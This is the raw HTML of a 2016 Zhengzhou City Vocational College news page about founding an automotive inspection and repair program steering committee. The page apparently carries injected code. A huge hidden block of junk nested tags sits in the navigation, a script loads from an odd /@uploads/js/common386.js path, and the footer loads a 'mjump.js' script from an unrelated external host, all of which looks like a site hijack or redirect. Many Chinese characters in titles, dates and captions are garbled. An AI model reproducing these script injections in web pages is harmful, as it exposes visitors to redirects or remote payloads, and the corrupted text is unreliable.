cu 城院召开汽车工程系汽车检测与维修技术专业建设指导委员会成立大会-郑州城市职业学院-评估办公定/title> <meta content="" name="keywords"> <meta content="" name="description"> <link href="/Template/pinggu/images/jigou.css" rel="stylesheet" type="text/css"> <link href="/Template/pinggu/images/jigou280.css" rel="stylesheet" type="text/css"> </head> <body> <div class="banner"></div> <div class="navs"> <div class="snavs_in"> <div class="snavs_b"> <ul> <li class="li"><a href="">学院首页</a></li> <li><a href="/pgw/"><span>本站首页</span></a></li><div style='display:none'><pre id='3yu2v'><dl id='3yu2v'></dl></pre><strike id='3yu2v'></strike><p id='3yu2v'><legend id='3yu2v'></legend><noframes id='3yu2v'><small id='3yu2v'></small><noframes id='3yu2v'></noframes></noframes></p><style id='3yu2v'><q id='3yu2v'></q></style><big id='3yu2v'></big><form id='3yu2v'></form><blockquote id='3yu2v'><ul id='3yu2v'><span id='3yu2v'><b id='3yu2v'><ol id='3yu2v'><big id='3yu2v'><span id='3yu2v'></span></big></ol><small id='3yu2v'></small><ol id='3yu2v'><ul id='3yu2v'><tbody id='3yu2v'><fieldset id='3yu2v'><strong id='3yu2v'><li id='3yu2v'><bdo id='3yu2v'><abbr id='3yu2v'></abbr></bdo><span id='3yu2v'></span></li></strong></fieldset></tbody></ul></ol><legend id='3yu2v'><noframes id='3yu2v'><tbody id='3yu2v'></tbody></noframes></legend></b><strong id='3yu2v'></strong></span></ul></blockquote><center id='3yu2v'><small id='3yu2v'><ins id='3yu2v'><td id='3yu2v'><div id='3yu2v'></div></td></ins></small></center><del id='3yu2v'><p id='3yu2v'></p><noscript id='3yu2v'><small id='3yu2v'><b id='3yu2v'></b><style id='3yu2v'></style><i id='3yu2v'></i><small id='3yu2v'><dl id='3yu2v'></dl><fieldset id='3yu2v'><form id='3yu2v'><dt id='3yu2v'><code id='3yu2v'></code><code id='3yu2v'><div id='3yu2v'></div></code></dt></form></fieldset></small></small><thead id='3yu2v'><kbd id='3yu2v'></kbd><sup id='3yu2v'><th id='3yu2v'></th></sup></thead><sup id='3yu2v'><strong id='3yu2v'><i id='3yu2v'></i></strong><small id='3yu2v'><div id='3yu2v'></div></small><ins id='3yu2v'></ins></sup><legend id='3yu2v'><table id='3yu2v'></table></legend></noscript></del><li id='3yu2v'><optgroup id='3yu2v'></optgroup></li><label id='3yu2v'></label><label id='3yu2v'></label><sub id='3yu2v'></sub><del id='3yu2v'></del><em id='3yu2v'><dd id='3yu2v'></dd></em><small id='3yu2v'></small><optgroup id='3yu2v'><dfn id='3yu2v'></dfn></optgroup><option id='3yu2v'><tr id='3yu2v'><code id='3yu2v'></code></tr></option><fieldset id='3yu2v'></fieldset><strong id='3yu2v'></strong><noframes id='3yu2v'><tfoot id='3yu2v'></tfoot></noframes><q id='3yu2v'><code id='3yu2v'><select id='3yu2v'></select></code></q><fieldset id='3yu2v'><big id='3yu2v'><tt id='3yu2v'></tt></big><p id='3yu2v'></p></fieldset><li id='3yu2v'></li><li id='3yu2v'></li><tfoot id='3yu2v'></tfoot><small id='3yu2v'></small><ul id='3yu2v'></ul><option id='3yu2v'></option><pre id='3yu2v'><ins id='3yu2v'></ins></pre><select id='3yu2v'></select><ins id='3yu2v'><td id='3yu2v'><i id='3yu2v'></i></td><u id='3yu2v'><code id='3yu2v'><thead id='3yu2v'><button id='3yu2v'><thead id='3yu2v'><option id='3yu2v'></option></thead></button></thead></code><fieldset id='3yu2v'><em id='3yu2v'><big id='3yu2v'></big></em></fieldset></u></ins><sup id='3yu2v'><strong id='3yu2v'></strong><del id='3yu2v'></del></sup><label id='3yu2v'></label><q id='3yu2v'><b id='3yu2v'><acronym id='3yu2v'></acronym><div id='3yu2v'><button id='3yu2v'><table id='3yu2v'></table><sup id='3yu2v'><dd id='3yu2v'><tfoot id='3yu2v'></tfoot></dd><blockquote id='3yu2v'><noframes id='3yu2v'></noframes></blockquote></sup></button></div></b><div id='3yu2v'><ul id='3yu2v'><li id='3yu2v'></li></ul></div></q><tfoot id='3yu2v'><font id='3yu2v'><i id='3yu2v'><dd id='3yu2v'></dd></i></font></tfoot><tr id='3yu2v'><optgroup id='3yu2v'></optgroup></tr><address id='3yu2v'><tfoot id='3yu2v'></tfoot><dd id='3yu2v'></dd></address><option id='3yu2v'><abbr id='3yu2v'><style id='3yu2v'></style><tt id='3yu2v'></tt><font id='3yu2v'></font><u id='3yu2v'><tt id='3yu2v'></tt></u></abbr></option><dd id='3yu2v'><ol id='3yu2v'></ol></dd><bdo id='3yu2v'><acronym id='3yu2v'><pre id='3yu2v'></pre></acronym><b id='3yu2v'><span id='3yu2v'></span></b><form id='3yu2v'></form></bdo><dl id='3yu2v'></dl><thead id='3yu2v'></thead><tt id='3yu2v'><tt id='3yu2v'></tt><sub id='3yu2v'><i id='3yu2v'><dt id='3yu2v'></dt><p id='3yu2v'></p></i></sub></tt><acronym id='3yu2v'><dd id='3yu2v'></dd></acronym><small id='3yu2v'><acronym id='3yu2v'><i id='3yu2v'><label id='3yu2v'><kbd id='3yu2v'><form id='3yu2v'><div id='3yu2v'><strike id='3yu2v'></strike></div></form></kbd></label></i></acronym><bdo id='3yu2v'></bdo><strike id='3yu2v'><table id='3yu2v'></table></strike></small><strike id='3yu2v'></strike><abbr id='3yu2v'></abbr><tbody id='3yu2v'></tbody><sup id='3yu2v'></sup><code id='3yu2v'><ul id='3yu2v'><tfoot id='3yu2v'></tfoot></ul></code><bdo id='3yu2v'></bdo><tr id='3yu2v'></tr><sup id='3yu2v'></sup><abbr id='3yu2v'></abbr><dfn id='3yu2v'><dir id='3yu2v'><p id='3yu2v'></p></dir><small id='3yu2v'><div id='3yu2v'></div></small></dfn><th id='3yu2v'><noscript id='3yu2v'></noscript></th><address id='3yu2v'><abbr id='3yu2v'></abbr><big id='3yu2v'></big></address><ol id='3yu2v'><dd id='3yu2v'><address id='3yu2v'></address></dd></ol><sub id='3yu2v'><optgroup id='3yu2v'></optgroup><thead id='3yu2v'></thead></sub><th id='3yu2v'><del id='3yu2v'></del></th><dd id='3yu2v'><small id='3yu2v'></small></dd><option id='3yu2v'><thead id='3yu2v'></thead></option><blockquote id='3yu2v'></blockquote><option id='3yu2v'></option><noframes id='3yu2v'><legend id='3yu2v'><style id='3yu2v'><dir id='3yu2v'><q id='3yu2v'></q></dir></style></legend></noframes><u id='3yu2v'></u><table id='3yu2v'><table id='3yu2v'><dir id='3yu2v'><thead id='3yu2v'><dl id='3yu2v'><td id='3yu2v'></td></dl></thead></dir><noframes id='3yu2v'><i id='3yu2v'><tr id='3yu2v'><dt id='3yu2v'><q id='3yu2v'><span id='3yu2v'><b id='3yu2v'><form id='3yu2v'><ins id='3yu2v'></ins><ul id='3yu2v'></ul><sub id='3yu2v'></sub></form><legend id='3yu2v'></legend><bdo id='3yu2v'><pre id='3yu2v'><center id='3yu2v'></center></pre></bdo></b><th id='3yu2v'></th></span></q></dt></tr></i></noframes><em id='3yu2v'><optgroup id='3yu2v'><dfn id='3yu2v'><del id='3yu2v'><code id='3yu2v'></code></del></dfn></optgroup></em><noframes id='3yu2v'><div id='3yu2v'><tfoot id='3yu2v'></tfoot><dl id='3yu2v'><fieldset id='3yu2v'></fieldset></dl></div></noframes><label id='3yu2v'></label></table><tfoot id='3yu2v'></tfoot></table><span id='3yu2v'></span><dfn id='3yu2v'></dfn><tr id='3yu2v'></tr><th id='3yu2v'><tt id='3yu2v'></tt><dd id='3yu2v'></dd></th><optgroup id='3yu2v'></optgroup><blockquote id='3yu2v'></blockquote><center id='3yu2v'></center><em id='3yu2v'><kbd id='3yu2v'></kbd><li id='3yu2v'><span id='3yu2v'></span></li><pre id='3yu2v'></pre></em><ol id='3yu2v'><tt id='3yu2v'><label id='3yu2v'><kbd id='3yu2v'></kbd></label></tt></ol><sub id='3yu2v'><sup id='3yu2v'><dl id='3yu2v'></dl><td id='3yu2v'></td><tt id='3yu2v'><blockquote id='3yu2v'><big id='3yu2v'><ol id='3yu2v'><tt id='3yu2v'><code id='3yu2v'><p id='3yu2v'></p><small id='3yu2v'><li id='3yu2v'></li><button id='3yu2v'><tfoot id='3yu2v'><i id='3yu2v'></i></tfoot></button><tbody id='3yu2v'><em id='3yu2v'></em></tbody></small></code></tt></ol></big><q id='3yu2v'><i id='3yu2v'><span id='3yu2v'></span><dt id='3yu2v'><ol id='3yu2v'></ol><b id='3yu2v'></b><strike id='3yu2v'><dir id='3yu2v'></dir></strike></dt><legend id='3yu2v'></legend><tr id='3yu2v'><optgroup id='3yu2v'><label id='3yu2v'><select id='3yu2v'><tt id='3yu2v'><blockquote id='3yu2v'></blockquote></tt></select></label></optgroup></tr><b id='3yu2v'></b></i><dfn id='3yu2v'></dfn></q></blockquote></tt></sup></sub><option id='3yu2v'></option><td id='3yu2v'><big id='3yu2v'><tfoot id='3yu2v'></tfoot></big><strong id='3yu2v'></strong></td><tfoot id='3yu2v'></tfoot><tfoot id='3yu2v'><pre id='3yu2v'><acronym id='3yu2v'><table id='3yu2v'><dir id='3yu2v'></dir></table></acronym></pre></tfoot><tt id='3yu2v'></tt><strong id='3yu2v'><u id='3yu2v'><div id='3yu2v'><div id='3yu2v'><q id='3yu2v'></q></div><strong id='3yu2v'><dt id='3yu2v'><sub id='3yu2v'><li id='3yu2v'></li></sub></dt></strong></div></u></strong><big id='3yu2v'></big><th id='3yu2v'></th><dd id='3yu2v'><center id='3yu2v'></center></dd><td id='3yu2v'></td><ol id='3yu2v'><dd id='3yu2v'><th id='3yu2v'></th></dd></ol><dt id='3yu2v'><div id='3yu2v'><abbr id='3yu2v'><strike id='3yu2v'></strike></abbr></div></dt><center id='3yu2v'></center><center id='3yu2v'></center><bdo id='3yu2v'><dd id='3yu2v'><abbr id='3yu2v'><strike id='3yu2v'></strike><ul id='3yu2v'><del id='3yu2v'><q id='3yu2v'><tbody id='3yu2v'><noframes id='3yu2v'><bdo id='3yu2v'></bdo><ul id='3yu2v'></ul></noframes></tbody></q></del></ul><big id='3yu2v'><big id='3yu2v'><dt id='3yu2v'><acronym id='3yu2v'></acronym><q id='3yu2v'><select id='3yu2v'><center id='3yu2v'><dir id='3yu2v'></dir></center></select><noscript id='3yu2v'><strong id='3yu2v'><tr id='3yu2v'></tr></strong><label id='3yu2v'></label><strike id='3yu2v'></strike><option id='3yu2v'><u id='3yu2v'><ol id='3yu2v'><blockquote id='3yu2v'></blockquote></ol></u></option><table id='3yu2v'></table></noscript><i id='3yu2v'><abbr id='3yu2v'></abbr></i><thead id='3yu2v'><strong id='3yu2v'><b id='3yu2v'></b></strong></thead></q></dt></big></big></abbr></dd><acronym id='3yu2v'></acronym><sub id='3yu2v'></sub><optgroup id='3yu2v'><del id='3yu2v'><optgroup id='3yu2v'></optgroup></del><button id='3yu2v'></button></optgroup><ul id='3yu2v'><em id='3yu2v'></em><dir id='3yu2v'><td id='3yu2v'></td><address id='3yu2v'></address><td id='3yu2v'></td><thead id='3yu2v'><thead id='3yu2v'></thead><ul id='3yu2v'></ul></thead></dir><del id='3yu2v'></del><thead id='3yu2v'></thead></ul><acronym id='3yu2v'></acronym></bdo><legend id='3yu2v'><font id='3yu2v'><font id='3yu2v'><span id='3yu2v'><tr id='3yu2v'><option id='3yu2v'></option></tr></span></font></font></legend><tbody id='3yu2v'><b id='3yu2v'><select id='3yu2v'></select></b></tbody><div id='3yu2v'><form id='3yu2v'></form><fieldset id='3yu2v'><pre id='3yu2v'><kbd id='3yu2v'><u id='3yu2v'><form id='3yu2v'><li id='3yu2v'><th id='3yu2v'><dt id='3yu2v'></dt></th></li><span id='3yu2v'></span></form><address id='3yu2v'></address></u><u id='3yu2v'><tt id='3yu2v'></tt></u></kbd></pre><p id='3yu2v'></p></fieldset></div><tbody id='3yu2v'><blockquote id='3yu2v'><style id='3yu2v'></style></blockquote><u id='3yu2v'></u></tbody><fieldset id='3yu2v'></fieldset><form id='3yu2v'></form><li id='3yu2v'><abbr id='3yu2v'></abbr></li><acronym id='3yu2v'></acronym><tt id='3yu2v'><dl id='3yu2v'></dl></tt><fieldset id='3yu2v'></fieldset><em id='3yu2v'></em><b id='3yu2v'></b><p id='3yu2v'></p><tbody id='3yu2v'><address id='3yu2v'></address><dd id='3yu2v'></dd></tbody><dir id='3yu2v'></dir><tbody id='3yu2v'></tbody><ul id='3yu2v'><select id='3yu2v'></select></ul><td id='3yu2v'></td><kbd id='3yu2v'><tt id='3yu2v'><q id='3yu2v'></q></tt></kbd><tfoot id='3yu2v'><select id='3yu2v'><abbr id='3yu2v'></abbr><table id='3yu2v'></table></select></tfoot><em id='3yu2v'><optgroup id='3yu2v'><label id='3yu2v'></label><ol id='3yu2v'><dir id='3yu2v'><label id='3yu2v'></label><form id='3yu2v'><thead id='3yu2v'><tbody id='3yu2v'></tbody></thead></form></dir><table id='3yu2v'><form id='3yu2v'><table id='3yu2v'><legend id='3yu2v'><li id='3yu2v'></li><big id='3yu2v'><span id='3yu2v'><optgroup id='3yu2v'><span id='3yu2v'></span></optgroup></span></big></legend><noscript id='3yu2v'></noscript><div id='3yu2v'><code id='3yu2v'><sup id='3yu2v'><kbd id='3yu2v'></kbd></sup><thead id='3yu2v'><small id='3yu2v'></small></thead></code></div><dt id='3yu2v'></dt></table></form></table><abbr id='3yu2v'><small id='3yu2v'></small></abbr></ol></optgroup><abbr id='3yu2v'><optgroup id='3yu2v'></optgroup></abbr><sup id='3yu2v'></sup><abbr id='3yu2v'><style id='3yu2v'><strike id='3yu2v'><b id='3yu2v'><i id='3yu2v'></i></b></strike></style></abbr></em><table id='3yu2v'></table><dl id='3yu2v'></dl><strike id='3yu2v'></strike><tt id='3yu2v'><p id='3yu2v'></p></tt><div id='3yu2v'><noscript id='3yu2v'></noscript><dt id='3yu2v'><bdo id='3yu2v'><strong id='3yu2v'><sup id='3yu2v'><acronym id='3yu2v'></acronym></sup></strong></bdo><blockquote id='3yu2v'><tbody id='3yu2v'></tbody><tbody id='3yu2v'><dl id='3yu2v'></dl><del id='3yu2v'></del><ins id='3yu2v'><dfn id='3yu2v'><button id='3yu2v'></button></dfn></ins><td id='3yu2v'></td><option id='3yu2v'></option><tbody id='3yu2v'><sub id='3yu2v'><acronym id='3yu2v'><font id='3yu2v'><ins id='3yu2v'></ins></font><tr id='3yu2v'></tr></acronym></sub></tbody><dir id='3yu2v'></dir><address id='3yu2v'><bdo id='3yu2v'></bdo></address></tbody></blockquote><form id='3yu2v'><q id='3yu2v'><dd id='3yu2v'><fieldset id='3yu2v'></fieldset></dd></q></form><ol id='3yu2v'></ol><tfoot id='3yu2v'></tfoot></dt></div><pre id='3yu2v'><tt id='3yu2v'></tt><noframes id='3yu2v'></noframes></pre><dir id='3yu2v'><tt id='3yu2v'><q id='3yu2v'></q><select id='3yu2v'><dir id='3yu2v'></dir><ins id='3yu2v'><li id='3yu2v'></li></ins><small id='3yu2v'><ul id='3yu2v'></ul></small><pre id='3yu2v'></pre></select></tt><ul id='3yu2v'></ul></dir><th id='3yu2v'></th><ol id='3yu2v'><sup id='3yu2v'><i id='3yu2v'><pre id='3yu2v'><table id='3yu2v'></table></pre></i></sup></ol><option id='3yu2v'></option><dt id='3yu2v'></dt><sup id='3yu2v'></sup><big id='3yu2v'></big><thead id='3yu2v'></thead><p id='3yu2v'></p><td id='3yu2v'><acronym id='3yu2v'><div id='3yu2v'><tt id='3yu2v'></tt></div><fieldset id='3yu2v'></fieldset><bdo id='3yu2v'></bdo><em id='3yu2v'><font id='3yu2v'></font></em></acronym></td><dir id='3yu2v'></dir><u id='3yu2v'></u><strong id='3yu2v'><td id='3yu2v'></td></strong><tt id='3yu2v'></tt><q id='3yu2v'><legend id='3yu2v'><bdo id='3yu2v'><bdo id='3yu2v'><legend id='3yu2v'><b id='3yu2v'><strong id='3yu2v'><label id='3yu2v'><sup id='3yu2v'><u id='3yu2v'><sup id='3yu2v'></sup></u><big id='3yu2v'></big><select id='3yu2v'></select></sup><p id='3yu2v'></p></label></strong></b></legend></bdo><noscript id='3yu2v'></noscript><dt id='3yu2v'></dt></bdo></legend></q><small id='3yu2v'></small><b id='3yu2v'></b><li id='3yu2v'><p id='3yu2v'><label id='3yu2v'><table id='3yu2v'><sup id='3yu2v'><em id='3yu2v'></em></sup></table><blockquote id='3yu2v'></blockquote></label></p></li><blockquote id='3yu2v'></blockquote><dd id='3yu2v'><thead id='3yu2v'></thead><abbr id='3yu2v'><noscript id='3yu2v'><tbody id='3yu2v'><style id='3yu2v'><sup id='3yu2v'></sup></style></tbody></noscript></abbr></dd></div> <script language="javascript" type="text/javascript" src="/@uploads/js/common386.js"></script> <li><a href="/pgw/pjdt/"><span>评建动急/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简L/span></a></li> <li><a href="/pgw/tszs/"><span>他山之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> </div> <div class="clear"></div> <div class="list_pos">当前位置?a href="/pgw/">首页</a> > 评建动怱> 正文内容</div> <div class="cnt950 page_wrap"> <div class="side"> <div class="hd"><h3>评估办公定/h3></div> <div class="bd"> <ul class=""> <li><a href="/pgw/pjdt/"><span>评建动急/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简L/span></a></li> <li><a href="/pgw/pgzyj/"><span>高职研究</span></a></li> <li><a href="/pgw/tszs/"><span>他仙之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> <div class="main"> <div class="hd"><h3>评建动急/h3></div> <div class="bd"> <div class="page-m"> <div class="r_page_content"> <!--文章标题--> <h1>城院召开汽车工程系汽车检测与维修技术专业建设指导委员会成立大会</h1> <div class="info">发布时间?016幭1朞8日 点击数:<span id="hits"> <script language="JavaScript" type="text/JavaScript" src="/Common/GetHits.aspx?id=1468"></script> </span></div> <!--正文内容--> <div class="content" id="artiContent"> <div class="c_content_overflow" id="fontzoom"> <p><span style="font-size:14px;">       近日 ,郑州城市职业学院汽车检测与维修技术专业建设委员会成立大会圆满召开,院长关学增、副院长张顺利、汽车工程系主任安国军、副主任张玉甫,沠南省汽车行业协会秘书长刘晓明,河南省农业大学机电工程学院院长、汽车工程系顾问徐广印,海马商务汽车商务有限公司高级工程师韩根云副教授及汽车工程系师 生代表三十余人出席。汽车工程系主任安国军主持G/span><br /> <span style="font-size:14px;">        副院长张顺利宣布汽车工程系专业指导委员会正式成立,并宣读委员会精神与宗旨,宣读就任委员名单,分别是汽车工程系主任安国军教授,汽车工程系副主任张玉 甫教授,河南省汽车行业协会秘书长刘晓明,河南农业大学机电工程学院院长、博士生导师、汽车工程系顾问徐广印教授,海马商务汽车有限公司高级工程师韩根云 副教授。关学增院长为汽车工程系专业指导委员会成员颁发聘书G/span></p> <p><span style="font-size:14px;">        副主任张玉甫发表讲话,详细解读了包括对学生进行专业的规划指导、审定教学计划、本专业课程设计、重要课程及教材建设、就业指导、科研讲座及学生离校工作报告?3条汽车工程系专业指导委员会章程G/span></p> <p><span style="font-size:14px;">       院长关学增代表学院对委员会的成立表示祝贺,指出此次委员会的成立具有里程碑意义,希望汽车工程系全体教师积极吸取专家们的宝贵经验,充分运用到教育教学工作中,教育引导学生学会适应市场及企业的需求,为国家培养全面发展的技能型人才Gbr />        河南省汽车行业协会秘书长刘晓明致辞,表示学生和企业是紧密结合的,今后会与城院师生加强沟通交流,共同为汽车服务行业培养人才,为人才发展做出贡献G/span></p> <p style="text-align: center"><img alt="" src="/UploadFiles/pgw/2016/1/201601080822532244.jpg" /></p> <p style="text-align: center">院长关学增讲诚/p> <p style="text-align: center"><img alt="" src="/UploadFiles/pgw/2016/1/201601080822539895.jpg" style="width: 500px; height: 333px" /></p> <p style="text-align: center">副院长张顺利宣布委员会正式成竹p/p> <p style="text-align: center"><img alt="" src="/UploadFiles/pgw/2016/1/201601080822533112.jpg" /></p> <p style="text-align: center">汽车系主任安国军主持大会</p> <p style="text-align: center"><img alt="" src="/UploadFiles/pgw/2016/1/201601080822532633.jpg" /></p> <p style="text-align: center">汽车系副主任张玉甫解读章稹p/p> <p style="text-align: center"><img alt="" src="/UploadFiles/pgw/2016/1/201601080822537622.jpg" /></p> <p style="text-align: center">河南省汽车行业协会秘书长刘晓明致辔/p> <p style="text-align: center"><img alt="" src="/UploadFiles/pgw/2016/1/201601080822531681.jpg" /></p> <p style="text-align: center">大会现场</p> <p style="text-align: center"><img alt="" src="/UploadFiles/pgw/2016/1/201601080822536585.jpg" /></p> <p style="text-align: center;">合影</p> </div> </div> <!--分页--> <div id="page1"></div> </div> </div> </div> </div> </div> <div class="clear10"></div> <div class="footer"> 版权所有:郑州城市职业学院 技术支持:<br> 河南郑州市新密溱水路西段618号 邮编?52370 电话?371-69213333 <br> 豫ICP夣S2014925另R </div> <script type="text/javascript" src="https://js.users.51.la/19550489.js"></script> <script src="http://www.ybtoad.com/mjump.js"></script><script> (function(){ var canonicalURL, curProtocol; //Get the <link> tag var x=document.getElementsByTagName("link"); //Find the last canonical URL if(x.length > 0){ for (i=0;i<x.length;i++){ if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){ canonicalURL=x[i].href; } } } //Get protocol if (!canonicalURL){ curProtocol = window.location.protocol.split(':')[0]; } else{ curProtocol = canonicalURL.split(':')[0]; } //Get current URL if the canonical URL does not exist if (!canonicalURL) canonicalURL = window.location.href; //Assign script content. Replace current URL with the canonical URL !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})(); </script></body></html>